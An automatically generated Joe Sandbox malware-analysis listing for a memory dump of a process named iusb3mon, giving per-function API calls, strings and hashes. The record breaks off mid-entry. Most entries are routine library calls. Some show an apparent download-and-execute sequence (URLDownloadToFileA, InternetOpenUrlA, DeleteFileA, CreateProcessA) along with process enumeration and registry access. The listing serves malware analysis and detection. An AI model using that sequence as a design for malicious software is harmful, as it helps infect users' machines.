Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: fc101c1779792af5c2f766e2adfa6480e2b85d032ed70dbcddba64cda3638507
Instruction ID: 3008bbbcf59ef7d3f26595379b830b73e8c193563db5e49026d75d9ca5e1d287
Opcode Fuzzy Hash: fc101c1779792af5c2f766e2adfa6480e2b85d032ed70dbcddba64cda3638507
Instruction Fuzzy Hash: 94211832D0021AFBDF228F85DC45ADEBFB6FF49350F15412AFA25661A0C3729961DB90

Function 06CF827E Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,?,?,06CF7ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 06CF82BA
VirtualFree.KERNEL32(?,00000000,00008000,?,?,06CF7ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 06CF82DE
GetProcessHeap.KERNEL32(00000000,?,?,?,06CF7ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 06CF82E6
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 06CF82ED

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$Heap$LibraryProcessVirtual
String ID:
API String ID: 548792435-0
Opcode ID: b2abd5ed746d242b7d45115d5f7e0ba4b77888aa56ea3e0b54edd9c9d67a4a03
Instruction ID: 0300132d0872378830807cd78ec95f18672c099dccc6fe026db26dde2ab20d08
Opcode Fuzzy Hash: b2abd5ed746d242b7d45115d5f7e0ba4b77888aa56ea3e0b54edd9c9d67a4a03
Instruction Fuzzy Hash: 87016D72901A019FDBA48FA8CCC8927B3F9FB442213044D2DF26693200C731B941CB10

Function 06D0A7C9 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 06D0A7D7
SendMessageA.USER32(00000000,?,?,?), ref: 06D0A80D
GetTopWindow.USER32(00000000), ref: 06D0A81A
GetWindow.USER32(00000000,00000002), ref: 06D0A838

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 51b75711c3a948d260e40d5bc76308eb20363995b7e2bb7ffcb422b7c6d8106f
Instruction ID: 15dc43555b076e1f2ba9f5d3c188770d303f1141ab049264c67b9f4500350f2e
Opcode Fuzzy Hash: 51b75711c3a948d260e40d5bc76308eb20363995b7e2bb7ffcb422b7c6d8106f
Instruction Fuzzy Hash: AB01E53240025ABFEF926F91DC04F9F3B7AEF49750F088020FA10551A2C736C666EBA1

Function 06D0A750 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 06D0A75B
GetTopWindow.USER32(00000000), ref: 06D0A76E
GetTopWindow.USER32(?), ref: 06D0A79E
GetWindow.USER32(00000000,00000002), ref: 06D0A7B9

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: f586020305456984bb3ed0e194d9427c4551b90e7b81c9a6e47ee427dafb3a09
Instruction ID: 58f8a65dae7b4101c5e8a08e5ba834f1cdbf639fc15391188e370088652581c9
Opcode Fuzzy Hash: f586020305456984bb3ed0e194d9427c4551b90e7b81c9a6e47ee427dafb3a09
Instruction Fuzzy Hash: CB017832C01716BBFBA22B619C00F9E7B79EF84B50B09C025FE109919AD771C51286E1

Function 06D08C3E Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 06D08C66
GetFocus.USER32 ref: 06D08C79
GetParent.USER32(?), ref: 06D08C87
GetNextDlgTabItem.USER32(?,?,00000000), ref: 06D08CA3

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 39745cdcd0edf9f202d5a095e38202ef05a0072d67c20cb8027a4c72a44999b0
Instruction ID: ebc8a2b77aa321478de0dfaf56c618445d803443e1bb8de39f834e9c6b086422
Opcode Fuzzy Hash: 39745cdcd0edf9f202d5a095e38202ef05a0072d67c20cb8027a4c72a44999b0
Instruction Fuzzy Hash: 7C115E71914A009FFB789F60D858F2ABBB6EF44311F108A2DE252866E0C7B1E855DB54

Function 06D065EF Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(06D288B8,00000001), ref: 06D06617
InitializeCriticalSection.KERNEL32(06D288A0,?,?,?,06D0495C), ref: 06D06622
EnterCriticalSection.KERNEL32(06D288A0,?,?,?,06D0495C), ref: 06D06661

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 059f289dcd8fbb228376069b3547c79c32449795712aa5eeb489f895fc5eb67b
Instruction ID: 7b73fbc1e718ab16f637f779508d7d4014a49808caf87176a93a0995f81c6d48
Opcode Fuzzy Hash: 059f289dcd8fbb228376069b3547c79c32449795712aa5eeb489f895fc5eb67b
Instruction Fuzzy Hash: 65F0C270B54251EFF7F14B64BC89B257BA6E7947A5F5004AAF342C23C0D671C098A7D1

Function 06D0AD58 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 06D0AD96
SetBkColor.GDI32(00000000,00000000), ref: 06D0ADA2
GetSysColor.USER32(00000008), ref: 06D0ADB2
SetTextColor.GDI32(00000000,?), ref: 06D0ADBC

Part of subcall function 06D0B81C: GetWindowLongA.USER32(00000000,000000F0), ref: 06D0B82D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: de63ea0d0d5fb19440116fc198d839b52655b339502b26fa75890a8199109c58
Instruction ID: f665c511563cd0f1099696bca52b5e432b07cd7064ac256b2eee75a775dfe974
Opcode Fuzzy Hash: de63ea0d0d5fb19440116fc198d839b52655b339502b26fa75890a8199109c58
Instruction Fuzzy Hash: BC016D3090020AABFF615F64DC49BAE3B69EB40312F594911FE11C51E1EB30C894DA71

Function 06CF8D94 Relevance: 6.0, APIs: 4, Instructions: 42processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,76228A60,06D22BE8,06D17FD0,06CF7609,06D17FD0,?,?,?), ref: 06CF8D9B
Process32First.KERNEL32(00000000,00000000), ref: 06CF8DB4
Process32Next.KERNEL32(00000000,00000000), ref: 06CF8DD0
lstrcmpiA.KERNEL32(00000024,06D22BE8), ref: 06CF8DDE

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 2530627638-0
Opcode ID: 2e2b1463f8a9fa90acd5373ac234bc0ad87d02360a5d327065d2e5a312d2856b
Instruction ID: f9ed52b35fbd775dff9e910e7c51fdde5f93b3e95a13f705d8a4f9f80f1f5e62
Opcode Fuzzy Hash: 2e2b1463f8a9fa90acd5373ac234bc0ad87d02360a5d327065d2e5a312d2856b
Instruction Fuzzy Hash: 52F03A32316212ABE7E06B669C44FBB6AEDEF95660F10082EF754D6180EB20D4029375

Function 06CF1BFF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF1C0F
Process32First.KERNEL32(00000000,?), ref: 06CF1C28
Process32Next.KERNEL32(00000000,00000128), ref: 06CF1C43
CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?,00000002,00000000), ref: 06CF1C68

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 677bb286e4151f8041c2ec9f9b3eb74c46f3ca4e4d4c0d951350e546f7d6a75c
Instruction ID: d494f61691df94da2fe1639d9716d333a62f7dec84f1f70873f2291fe5a4fb4a
Opcode Fuzzy Hash: 677bb286e4151f8041c2ec9f9b3eb74c46f3ca4e4d4c0d951350e546f7d6a75c
Instruction Fuzzy Hash: 64F09C71601209DBEBE0ABA5DC84FEAB3FCEF48354F000079E744D1180DE74C9558A30

Function 06D0B8DB Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 06D0B8E8
GetWindowTextA.USER32(?,?,00000100), ref: 06D0B904
lstrcmpA.KERNEL32(?,?), ref: 06D0B918
SetWindowTextA.USER32(?,?), ref: 06D0B928

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 67520b4937ba493edaea789f92d939f5e9e69e078122f32378c929c40fda33c9
Instruction ID: 83fb78440cfa5fca0d3a04975426c677b21561b27dce943d081863a59ee16f89
Opcode Fuzzy Hash: 67520b4937ba493edaea789f92d939f5e9e69e078122f32378c929c40fda33c9
Instruction Fuzzy Hash: 01F0F836800118ABEF226F64EC48BED7B6EEB1C391F008422F949D1250E771DA988B90

Function 06CF3D3B Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 06CF3D53

Strings

Console, xrefs: 06CF3D62
Remarkbeizhu, xrefs: 06CF3D41
Groupfenzhu, xrefs: 06CF3D48, 06CF3D61

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: strlen
String ID: Console$Groupfenzhu$Remarkbeizhu
API String ID: 39653677-274741502
Opcode ID: 4c550fbc2dcccab43b2eb6ffa46b6016465d2ba734601b561a528adcc9f8c67d
Instruction ID: 8458a7587aeb49f72315773d47a066bdf70bb216bb0f073f9db99937fb7a5d93
Opcode Fuzzy Hash: 4c550fbc2dcccab43b2eb6ffa46b6016465d2ba734601b561a528adcc9f8c67d
Instruction Fuzzy Hash: 2FD05B31954251FBD7D05A14FC09FE77A56EB50710F15445DB6182D2B1C6F248D0C7B1

Function 06CF703A Relevance: 6.0, APIs: 4, Instructions: 17servicesleepregistryCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,06CF7029), ref: 06CF7048
CloseServiceHandle.ADVAPI32(?,06CF7029), ref: 06CF705C
RegCloseKey.ADVAPI32(?,06CF7029), ref: 06CF7070
Sleep.KERNEL32(000001F4,06CF7029), ref: 06CF707B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$HandleService$Sleep
String ID:
API String ID: 994006413-0
Opcode ID: ef844c7a076ead1bb9d69ed9986e3bc120655cffd78c8bc36f7895a8d89a349c
Instruction ID: bcb7ce6682ac98ffe4a8e36b58445ce59aed25b39e64271bbe53281465008508
Opcode Fuzzy Hash: ef844c7a076ead1bb9d69ed9986e3bc120655cffd78c8bc36f7895a8d89a349c
Instruction Fuzzy Hash: 33E075318141569FEFF56FA0ED4975C7B76AF00301F4444E8A30D642608A711BD5DE50

Function 06CF1606 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF160B

Strings

bad buffer, xrefs: 06CF16C5
bad Allocate, xrefs: 06CF17C9

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: bad Allocate$bad buffer
API String ID: 3519838083-2913219628
Opcode ID: c08233037a0828269a94f7c7cac0417515c6fba6ba340e3e4ecedcb788116604
Instruction ID: 0ac4569daa546b6fe79a92f20870ff07ec31a8fe63394f32ccd471e0f17e18a0
Opcode Fuzzy Hash: c08233037a0828269a94f7c7cac0417515c6fba6ba340e3e4ecedcb788116604
Instruction Fuzzy Hash: 9B518371A10209EBCFC4EFA5CC40AEEB7B9AF44610F18801AE715E6680DB749B44DB91

Function 00C01EA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00C0202F

Part of subcall function 00C06F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C011FC,?,?,?,?,00C011FC,?,00C2A814), ref: 00C06F94

Strings

ios_base::badbit set, xrefs: 00C01FC7, 00C01FF2, 00C02013
ios_base::failbit set, xrefs: 00C01EC8

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 9408c43a48cf3a0cbf376da71faacc4849604c0cdca02f35d6bcbaca2ca17024
Instruction ID: 29fb8d1bceda36f5d7f3e830c49c73d31a4d4f424fefc654544c7c955fabe327
Opcode Fuzzy Hash: 9408c43a48cf3a0cbf376da71faacc4849604c0cdca02f35d6bcbaca2ca17024
Instruction Fuzzy Hash: BD51D7B1910219ABCB04DF98DC41BAEF7F8EF49710F18821AFD15976C1E770AA44DBA1

Function 06CFE2C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 06CFE2D4

Strings

, xrefs: 06CFE31D
, xrefs: 06CFE2F9

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: daf93633db3cd861b757300eb0f0e6fd21d290aa5b5fa0cc16a3f00244bb4b9b
Instruction ID: ba162343ec57a38a4a4f8c4764a584c57a793a8e6cf1ce13a630610575eff0a2
Opcode Fuzzy Hash: daf93633db3cd861b757300eb0f0e6fd21d290aa5b5fa0cc16a3f00244bb4b9b
Instruction Fuzzy Hash: 50419B314142683EEBA28794CC5DFEA7F999B09700F1805E8D786CB1B2C231464CEFB2

Function 06CF4498 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72processCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF6316: DeleteFileA.KERNEL32(?,06CF44DD,00000000,00000001), ref: 06CF6344
Part of subcall function 06CF6316: LoadLibraryA.KERNEL32(wininet.dll), ref: 06CF6357
Part of subcall function 06CF6316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 06CF636E
Part of subcall function 06CF6316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 06CF638E
Part of subcall function 06CF6316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 06CF639A
Part of subcall function 06CF6316: FreeLibrary.KERNEL32(00000000), ref: 06CF63BC

Part of subcall function 06CF95BC: GetFileAttributesA.KERNEL32(06CF5CC4,06CF5CC4,00000000), ref: 06CF95C0
Part of subcall function 06CF95BC: GetLastError.KERNEL32 ref: 06CF95CB

CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06CF4519

Strings

WinSta0\Default, xrefs: 06CF4512
D, xrefs: 06CF44FC

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressFileLibraryProc$AttributesConnectCreateDeleteErrorFreeInternetLastLoadProcess
String ID: D$WinSta0\Default
API String ID: 1472976565-1101385590
Opcode ID: f8de1dc6e1ee8d757aac191a25cdceaef484e982f015e97fde0724190158e509
Instruction ID: 379bffd504a013aac0a737814e780d4256895a6c7811a56e6d22d0c3b6d5b46e
Opcode Fuzzy Hash: f8de1dc6e1ee8d757aac191a25cdceaef484e982f015e97fde0724190158e509
Instruction Fuzzy Hash: 6D01E1B26101296BEBE4ABE59C04EEB77ACDF05361F10402AFB06A6241EA74960496E1

Function 06CF5C32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71filenetworkCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF5C98
URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 06CF5CAE

Part of subcall function 06CF95BC: GetFileAttributesA.KERNEL32(06CF5CC4,06CF5CC4,00000000), ref: 06CF95C0
Part of subcall function 06CF95BC: GetLastError.KERNEL32 ref: 06CF95CB

Part of subcall function 06CF5AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06CF5AEA
Part of subcall function 06CF5AA1: RegQueryValueA.ADVAPI32(00000000,00000000,?,06CF5CD7), ref: 06CF5B09
Part of subcall function 06CF5AA1: RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06CF5B14
Part of subcall function 06CF5AA1: wsprintfA.USER32 ref: 06CF5B3C
Part of subcall function 06CF5AA1: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06CF5B5C

Strings

c:\%s, xrefs: 06CF5C92

Memory Dump Source

